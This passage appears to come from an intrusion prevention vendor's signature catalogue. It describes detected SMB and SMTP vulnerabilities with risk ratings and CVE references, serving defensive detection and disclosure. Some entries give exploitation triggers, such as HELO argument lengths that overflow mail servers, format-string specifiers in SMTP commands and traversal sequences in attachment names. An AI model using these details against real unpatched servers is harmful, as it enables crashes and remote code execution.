File-Exe_SmartScreen-Security-warning-Bypass-For-PE-Files-CVE-2023-24880
References:
CVE-2023-24880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24880
ms23-mar
http://technet.microsoft.com/security/bulletin/ms23-mar
Back to top

Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in smartstore SmartStoreNET
Risk: Moderate
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Platform: Generic
Software: SmartStoreNET
Type: Input Validation
Description: Improper input validation of user input in forum posts causes a cross-site scripting vulnerability in SmartStoreNet. A successful exploit allows an attacker to execute arbitrary code in a user's browser.
Situation: HTTP_CRL-Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting
References:
CVE-2021-32608
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32608
Back to top

Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in smartstore SmartStoreNET
Risk: Moderate
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: SmartStoreNET
Type: Input Validation
Description: Improper validation of user input in forum posts causes a cross-site scripting vulnerability in SmartStoreNet. A successful exploit allows an attacker to execute arbitrary code in a user's browser.
Situation: HTTP_CRL-Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting
References:
CVE-2021-32607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32607
Back to top

Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119

About this vulnerability: An attempt to exploit a vulnerability in Smarty detected
Risk: High
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Smarty
Type: Input Validation
Description: Smarty before 3.1.39 allows a sandbox escape because "$smarty.template_object" can be accessed in the sandbox mode.
Situation: HTTP_CRL-Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119
References:
CVE-2021-26119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26119
Back to top

SMB-AndX-Chain

About this vulnerability: An SMB AndX chain was detected
Risk: Moderate
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Format String
Description: An SMB AndX chain was detected
Situation: SMB-TCP_CHS-SMB-AndX-Chain
Back to top

SMB-Client-Memory-Allocation-CVE-2010-0269

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Input Validation
Description: There is a client-side vulnerability in Microsoft Windows SMBv1. When exploited successfully, the vulnerability allows code execution in ring0 context.
Situation: SMB-TCP_SMB-Client-Memory-Allocation-CVE-2010-0269
References:
CVE-2010-0269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0269
MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020
Back to top

SMB-Failed-Session-Setup

About this vulnerability: SMB Session Setup was denied
Risk: Low
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Failed Login
Description: Server Message Protocol (SMB) is a networking protocol that allows remote computers to share resources. It is an internal part of all Windows operating systems, and it has been implemented in various other operating systems to improve networking with the Windows operating systems. Session Setup is a necessary step when communicating using SMB. The failure of the session setup means that someone has tried to access remote computer resources, for example a remote logon, without sufficient privileges. If this happens many times, it can indicate a brute force attack or some misconfiguration.
Situation: SMB-TCP_Failed-Session-Setup
Back to top

SMB-Filename-Obfuscation

About this vulnerability: An obfuscated filename was found in a SMB message
Risk: Low
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An obfuscated filename was found in a SMB message
Situation: SMB-TCP_CHS-SMB-Filename-Obfuscation
Back to top

SMB-Multiple-Tree-Connections

About this vulnerability: An unusual situation in an SMB session
Risk: Low
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An unusual situation in an SMB session
Situation: SMB-TCP_SHS-Multiple-Tree-Connections
Back to top

SMB-NetBIOS-Request-Buffer-Overflow

About this vulnerability: Buffer overflow in Microsoft's SMB implementation.
Risk: Moderate
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000; Windows XP
Software: <os>
Type: Buffer Overflow
Description: Due to a flaw in Microsoft's SMB implementation, an attacker can send a specifically crafter packet which can crash the target host. It has not been confirmed whether this vulnerability can be used to execute arbitrary commands.
Situation: SMB-TCP_CHS-Request-Buffer-Overflow
References:
CVE-2002-0724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0724
BID-5556
http://www.securityfocus.com/bid/5556
MS02-045
http://technet.microsoft.com/security/bulletin/MS02-045
Back to top

SMB-Nonzero-Reserved-Value-In-AndX-Header

About this vulnerability: An unusual value was found in an SMB message
Risk: Low
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An unusual value was found in an SMB message
Situation: SMB-TCP_CHS-Nonzero-Reserved-Value-In-AndX-Header
Back to top

SMB-Pool-Overflow-MS10-054

About this vulnerability: A memory corruption vulnerability in Samba
Risk: Critical
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a memory corruption vulnerability in SMB Server. A remote unauthenticated attacker can exploit this vulnerability by specifying a malicious request to compromise the vulnerable system.
Situation: SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054
SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054-2
References:
CVE-2010-2550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550
MS10-054
http://technet.microsoft.com/security/bulletin/MS10-054
Back to top

SMB-Samba-Domain-Controller-Service-Crafted-Mailslot-Name-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Samba mailslot name handling
Risk: High
First detected in: sgpkg-ips-135-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Solaris; Mac OS X
Software: Samba
Type: Buffer Overflow
Description: The implementation of Domain Controller protocols in Samba suffers from a buffer overflow vulnerability in the handling of certain mailslot requests. A mailslot SAM LOGON message with a long mailslot name can be used to overflow a buffer and to possibly execute arbitrary code. This vulnerability can be exploited by unauthenticated remote attackers over UDP.
Situation: Generic_UDP-Samba-Domain-Controller-Crafted-Mailslot-Name-Buffer-Overflow
References:
CVE-2007-6015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6015
BID-26791
http://www.securityfocus.com/bid/26791
Back to top

SMB-Samba-Dot-Slash-Combination-Directory-Traversal

About this vulnerability: Samba directory traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Samba
Type: Malfunction
Description: A design flaw in the sanitation of filenames causes Samba to allow access to files outside the share path. To exploit the vulnerability, the attacker needs an account that has the rights to access the wanted files.
Situation: SMB-TCP_CHS-SMB-Samba-Dot-Slash-Combination-Directory-Traversal
References:
CVE-2004-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815
BID-11281
http://www.securityfocus.com/bid/11281
Back to top

SMB-Transaction-Command-Nonzero-Reserved-Field

About this vulnerability: An unusual value in an SMB command was detected
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: An unusual value in an SMB command was detected
Situation: SMB-TCP_CHS-Transaction-Command-Nonzero-Reserved-Field
Back to top

SMB-Unimplemented-Command-Com-Close-And-Tree-Disc

About this vulnerability: An unimplemented SMB command was detected
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: An unimplemented SMB command was detected
Situation: SMB-TCP_CHS-Unimplemented-Command-Com-Close-And-Tree-Disc
Back to top

SMB-Unimplemented-Command-Com-New-File-Size

About this vulnerability: An unimplemented SMB command was detected
Risk: Moderate
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: An SMB command which is not implemented by any server was detected
Situation: SMB-TCP_CHS-Unimplemented-Command-Com-New-File-Size
Back to top

SMB-Windows-Server-Message-Block-Vulnerability

About this vulnerability: Windows SMB vulnerability known as the "Server Message Block Vulnerability"
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Certain versions of Microsoft Windows suffer from the Server Message Block Vulnerability, a vulnerability in the SMB implementation. A buffer overflow occurs when handling crafted SMB headers, allowing remote attackers to cause a denial of service and possibly execute arbitrary code.
Situation: SMB-TCP_CHS-Windows-Server-Message-Block-Vulnerability
References:
CVE-2005-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1206
MS05-027
http://technet.microsoft.com/security/bulletin/MS05-027
Back to top

SMB2-Dialect-Requested

About this vulnerability: An SMB client requested the SMB2 dialect
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An unusual value in an SMB command was detected
Situation: SMB-TCP_CHS-SMB2-Dialect-Requested
Back to top

SMB_CA-BrightStor-Discovery-Service-Mailslot-Buffer-Overflow-Vulnerability

About this vulnerability: Buffer overflow vulnerability in Mailslot handling of CA BrightStor Discovery Service
Risk: Moderate
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: Computer Associates BrightStor Discovery Service suffers from a buffer overflow vulnerability in the handling of long Mailslot messages. A successful attack allows remote attackers to execute arbitrary code on the vulnerable host.
Situation: SMB-TCP_CHS-CA-BrightStor-Discovery-Service-CheyenneDS-Mailslot-Traffic-Detected
References:
CVE-2006-5142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142
BID-20364
http://www.securityfocus.com/bid/20364
Back to top

SMTP-1st-Up-Multi-Command-Crash

About this vulnerability: SMTP 1st Up Multi Command Crash
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 1st Up Mail Server
Type: Malfunction
Description: Mail server will crash if the client sends multiple commands in single line. Example: "MAIL HELP"
Situation: SMTP_Multi-Command-Crash
Back to top

SMTP-Analogx-Helo-BOF

About this vulnerability: SMTP Analogx Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AnalogX Proxy
Type: Buffer Overflow
Description: AnalogX proxy server contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 370 bytes or more triggers the overflow.
Situation: SMTP_Helo-Overflow
References:
CVE-2000-0656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0656
BID-1504
http://www.securityfocus.com/bid/1504
Back to top

SMTP-Apple-Appleshare-Helo-BOF

About this vulnerability: SMTP Apple Appleshare Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS 8
Software: AppleShare Mail Server
Type: Buffer Overflow
Description: AppleShare Mail Server contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 500 bytes triggers the overflow.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284
BID-61
http://www.securityfocus.com/bid/61
Back to top

SMTP-Apple-Stalker-Helo-BOF

About this vulnerability: SMTP Apple Stalker Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS
Software: Stalker Internet Mail Server version
Type: Buffer Overflow
Description: Stalker Internet Mail Server contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 579 bytes triggers the overflow.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-1504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1504
BID-62
http://www.securityfocus.com/bid/62
Back to top

SMTP-BitDefender-AntiVirus-Logging-Function-Format-String

About this vulnerability: BitDefender AntiVirus Logging Function Format String Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BitDefender
Type: Format String
Description: The Softwin BitDefender AntiVirus product has a format string vulnerability. The vulnerability can be exploited by delivering a file with a filename containing format string identifiers to a target system that has the vulnerable product installed. A successful exploitation of this vulnerability can lead to arbitrary code excecution or terminate the current virus scanning process without any log information about the unexpected termination.
Situation: E-Mail_HCS-BitDefender-AntiVirus-Logging-Function-Format-String
References:
CVE-2005-3154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3154
BID-14968
http://www.securityfocus.com/bid/14968
OSVDB-19840
http://www.osvdb.org/19840
Back to top

SMTP-Citadel-Helo-BOF

About this vulnerability: SMTP Citadel Helo BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Citadel
Type: Buffer Overflow
Description: Citadel/UX contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.
Situation: SMTP_Helo-Overflow
References:
CVE-2002-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0432
BID-4263
http://www.securityfocus.com/bid/4263
Back to top

SMTP-Cmail-Helo-BOF

About this vulnerability: SMTP Cmail Helo BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computalynx CMail POP3 mail server
Type: Buffer Overflow
Description: A buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.
Situation: SMTP_Helo-Overflow
References:
CVE-2001-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0742
Back to top

SMTP-Csm-Helo-BOF

About this vulnerability: SMTP Csm Helo BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CSM mail server
Type: Buffer Overflow
Description: CSM Mail Server for Windows 95/NT has buffer overflow in HELO argument processing. This vulnerability can be exploited to cause a denial of service situation or to possible allow arbitrary code.
Situation: SMTP_Helo-Overflow
References:
CVE-2000-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0042
BID-895
http://www.securityfocus.com/bid/895
Back to top

SMTP-Debug-Backdoor

About this vulnerability: SMTP Debug Backdoor
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Backdoor
Description: Sendmail contain a debug command, DEBUG, which if enabled allows remote attackers to execute commands as root.
Situation: SMTP_Debug-Detect
References:
CVE-1999-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
Back to top

SMTP-Dsmtp-Xtellmail-Format-String-System-Compromise

About this vulnerability: dSMTP xtellmail command format string system compromise
Risk: High
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: dSMTP
Type: Format String
Description: dSMTP has a format strings vulnerability in the handling of xtellmail commands. Unauthenticated remote attackers can execute arbitrary commands on a server running dSMTP 3.1a or 3.1b by sending a xtellmail command followed by format string specifiers and shellcode.
Situation: SMTP_Dsmtp-Xtellmail-Format-String-System-Compromise
References:
CVE-2005-1478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1478
BID-13505
http://www.securityfocus.com/bid/13505
Back to top

SMTP-Eserv-Helo-BOF

About this vulnerability: SMTP Eserv Helo BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Eserv
Type: Buffer Overflow
Description: Eserv contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.
Situation: SMTP_Helo-Overflow
References:
CVE-2000-0907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0907
Back to top

SMTP-Exchange-Helo-BOF

About this vulnerability: SMTP Exchange Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Buffer Overflow
Description: Exchange SMTP Server contains a buffer overflow vulnerability in HELO argument processing.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284
Back to top

SMTP-Exchange-Mail-Relay

About this vulnerability: SMTP Mail Relay
Risk: Low
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 5.5
Type: Malfunction
Description: Microsoft Exchange 5.5 allows a remote spammer to relay email using encapsulated SMTP addresses, even if the anti-relaying features are enabled.
Situation: SMTP_Relay
References:
CVE-1999-0682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0682
BID-567
http://www.securityfocus.com/bid/567
MS99-027
http://technet.microsoft.com/security/bulletin/MS99-027
Back to top

SMTP-Exchange-Server-X-LINK2STATE-Chunk-System-Compromise

About this vulnerability: Exchange Server 2000 and 2003 X-LINK2STATE buffer overflow
Risk: High
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 2000; Exchange Server 2003
Type: Buffer Overflow
Description: Microsoft Exchange Server 2000 and 2003 suffer from a buffer overflow vulnerability, which allows remote attackers to execute arbitrary code by connecting to the SMTP port and issuing specially-crafted commands. The vulnerability can be exploited by sending large chunks with the X-LINK2STATE verb.
Situation: SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise
SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise-2
SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise-3
References:
CVE-2005-0560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0560
BID-13118
http://www.securityfocus.com/bid/13118
OSVDB-15467
http://www.osvdb.org/15467
MS05-021
http://technet.microsoft.com/security/bulletin/MS05-021
Back to top

SMTP-Extremail-Flow-Format-Strings-Vulnerability

About this vulnerability: Format Strings vulnerability in flog function of eXtremail
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: eXtremail
Type: Format String
Description: EXtremail SMTP server software has a format strings vulnerability in its flog function. This vulnerability can be exploited easily since working exploits exists in the wild.
Situation: SMTP_Format-String-Specifiers-In-Argument-To-MAIL
References:
CVE-2001-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1078
BID-2908
http://www.securityfocus.com/bid/2908
Back to top

SMTP-FTGatePro-Mail-Server-RCPT-To-Buffer-Overflow

About this vulnerability: FTGatePro Mail Server RCPT To Buffer Overflow
Risk: High
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Floosietek FTGatePro
Type: Buffer Overflow
Description: Buffer overflow in Floosietek FTGate Pro Mail Server (FTGatePro) 1.22 allow remote attackers to execute arbitrary code via long RCPT To command.
Situation: SMTP_RCPT-To-BOF
References:
CVE-2003-0263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0263
BID-7508
http://www.securityfocus.com/bid/7508
Back to top

SMTP-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability with UUE files in the attachment viewer of IBM Lotus Notes
Risk: Moderate
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Notes
Type: Buffer Overflow
Description: The attachment viewer of IBM Lotus Notes has a buffer overflow vulnerability in the handling of UU-Encoded files. With a long file name attribute in the UUE-file header line a remote attacker is able to overflow a fixed size stack buffer and possibly divert the flow of the process to an arbitrary code block.
Situation: E-Mail_BS-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
References:
CVE-2005-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2618
BID-16576
http://www.securityfocus.com/bid/16576
OSVDB-23068
http://www.osvdb.org/23068
OSVDB-23067
http://www.osvdb.org/23067
OSVDB-23066
http://www.osvdb.org/23066
OSVDB-23065
http://www.osvdb.org/23065
OSVDB-23064
http://www.osvdb.org/23064
Back to top

SMTP-Imate-Webmail-Helo-BOF

About this vulnerability: SMTP Imate Webmail Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Concatus IMate Web Mail Server
Type: Buffer Overflow
Description: Concatus IMate Web Mail Server version 2.5 has buffer overflow vulnerability in its HELO argument processing. By sending a HELO command with over 1119 chars as argument, the mail server software should crash.
Situation: SMTP_Helo-Overflow
References:
CVE-2000-0507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0507
BID-1286
http://www.securityfocus.com/bid/1286
Back to top

SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability

About this vulnerability: Ipswitch Collaboration Suite format string vulnerability in multiple SMTP commands
Risk: High
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ipswitch Collaboration Suite; IMail
Type: Format String
Description: Ipswitch SMTP servers suffer from a format string vulnerability in the handling of clients SMTP commands. Format string specifiers passed as arguments to the commands EHLO, MAIL, RCPT and EXPN allow attackers to manipulate heap and stack memory, possibly leading to arbitary code execution. No authentication is required to exploit this vulnerability.
Situation: SMTP_Format-String-Specifiers-In-Argument-To-EHLO
SMTP_Format-String-Specifiers-In-Argument-To-MAIL
SMTP_Format-String-Specifiers-In-Argument-To-Expn
SMTP_Format-String-Specifiers-In-Argument-To-RCPT
References:
CVE-2005-2931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2931
BID-15752
http://www.securityfocus.com/bid/15752
Back to top

SMTP-Ipswitch-Helo-BOF

About this vulnerability: SMTP Ipswitch Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail; Exchange Server; MDaemon
Type: Buffer Overflow
Description: Ipswitch SMTP Server contains a buffer overflow vulnerability in HELO argument processing.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284
Back to top

SMTP-Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Ipswitch IMail Server
Risk: High
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: Ipswitch IMail Server has a stack-based buffer overflow vulnerability. By successfully exploiting this vulnerability a remote attacker can cause a DoS or compromise the vulnerable system.
Situation: SMTP_Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow
References:
CVE-2006-4379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379
BID-19885
http://www.securityfocus.com/bid/19885
OSVDB-28576
http://www.osvdb.org/28576
Back to top

SMTP-Lotus-Notes-RCPT-To-Policy-BOF

About this vulnerability: Buffer Overflow in Lotus Notes SMTP Server RCPT TO argument processing
Risk: High
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Buffer Overflow
Description: Buffer overflow in Lotus Notes mail server RCPT To argument processing allows remote attacker to execute arbitraty commands in the server. The buffer overflow occurs only if mail forwarding domain policy is enabled.
Situation: SMTP_RCPT-To-BOF
References:
CVE-2001-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0260
BID-2283
http://www.securityfocus.com/bid/2283
OSVDB-3321
http://www.osvdb.org/3321
Back to top

SMTP-Mail-Relay

About this vulnerability: SMTP Mail Relay
Risk: Low
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Misconfiguration
Description: A mail server is explicitly configured to allow SMTP mail relay, which allows abuse by spammers.
Situation: SMTP_Relay
References:
CVE-1999-0512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0512
Back to top

SMTP-MailEnable-SMTP-Authentication-Buffer-Overflow

About this vulnerability: MailEnable buffer overflow vulnerability in an AUTH command
Risk: High
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: MailEnable has a buffer overflow vulnerability in the handling of the AUTH command. A remote attacker can exploit this vulnerability by sending an SMTP AUTH command with an excessively long username argument which leads to a stack buffer overrun causing a DoS or execution of arbitrary commands on the server.
Situation: SMTP_MailEnable-SMTP-Authentication-Buffer-Overflow
References:
CVE-2005-1781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1781
BID-13772
http://www.securityfocus.com/bid/13772
OSVDB-16851
http://www.osvdb.org/16851
Back to top

SMTP-MailEnable-SMTP-Helo-Command-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in MailEnable
Risk: Moderate
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: MailEnable has a denial of service vulnerability in the handling of the HELO command. A remote attacker can exploit this vulnerability by sending an SMTP HELO command with a crafted domain argument which leads to a denial of service condition.
Situation: SMTP_MailEnable-SMTP-Helo-Command-Denial-Of-Service
References:
CVE-2006-3277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3277
BID-18630
http://www.securityfocus.com/bid/18630
OSVDB-26791
http://www.osvdb.org/26791
Back to top

SMTP-Mailman-Bad-Date-Data-Denial-Of-Service

About this vulnerability: Mailman bad date data denial of service vulnerability
Risk: Low
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mailman
Type: Malfunction
Description: Mailman versions 2.1.4 - 2.1.6 suffer from a denial of service vulnerability while processing email messages with a bad date field. A malformed message sent to a mailing list handled by Mailman can stop further processing of the list, allowing remote attackers to break mailing lists handled by Mailman by sending a malicious message.
Situation: E-Mail_HCS-Malformed-Date-Header-Field
References:
CVE-2005-4153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4153
BID-16248
http://www.securityfocus.com/bid/16248
OSVDB-21723
http://www.osvdb.org/21723
Back to top

SMTP-Mailman-Utf8-Encoded-Attachment-Filename-Denial-Of-Service

About this vulnerability: Mailman does not handle correctly attachments with UTF-8 encoded filenames
Risk: Low
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mailman
Type: Malfunction
Description: Mailman versions 2.1.5 - 2.1.8 do not handle correctly e-mail attachments with utf-8 encoded filenames. If Mailman encounters such attachments while processing a mailing list, the list will stop working. This allows remote attackers to execute denial of service attacks against mailing lists simply by sending crafted e-mail messages to them.
Situation: E-Mail_HCS-Malformed-Utf8-Encoded-Attachment-Filename
References:
CVE-2005-3573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3573
BID-15408
http://www.securityfocus.com/bid/15408
OSVDB-20819
http://www.osvdb.org/20819
Back to top

SMTP-Mailmax-BOF

About this vulnerability: SMTP Mailmax BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mail-Max
Type: Buffer Overflow
Description: Mail-Max contains a buffer overflow in Mail-Max SMTP software allows remote attacker to gain administrator priviledges.
Situation: SMTP_Win-ShellCode-1
References:
CVE-1999-0404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0404
Back to top

SMTP-McAfee-WebShield-SMTP-Bounce-Message-Format-String

About this vulnerability: McAfee WebShield SMTP bounce message format string vulnerability
Risk: High
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee WebShield SMTP
Type: Format String
Description: McAfee WebShield SMTP version 4.5 MR1a and prior has a format string vulnerability. A remote attacker can exploit this vulnerability by sending an SMTP message with a crafted destination address containing format string specifiers in the RCPT TO command to the target server, which can lead to a DoS or execution of arbitrary commands on the server.
Situation: SMTP_McAfee-WebShield-SMTP-Bounce-Message-Format-String
References:
CVE-2006-0559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0559
BID-16742
http://www.securityfocus.com/bid/16742
OSVDB-24366
http://www.osvdb.org/24366
Back to top

SMTP-MDaemon-Content-Filter-Directory-Traversal

About this vulnerability: MDaemon Content Filter directory traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Directory Traversal
Description: The Alt-N MDaemon email server software has a directory traversal vulnerability. The exploitation of this vulnerability is possible if the quarantine option of the vulnerable product is enabled on the target system. The vulnerability can be exploited by delivering an email message with a malicious attachment of which filename contains directory traversal sequences to a target system. A successful exploitation causes the malicious attachment file to be placed in an arbitrary location on the target system, which may lead to arbitrary code excecution later, for example during the next startup.
Situation: E-Mail_HCS-MDaemon-Content-Filter-Directory-Traversal
References:
BID-14400
http://www.securityfocus.com/bid/14400
OSVDB-18348
http://www.osvdb.org/18348
Back to top

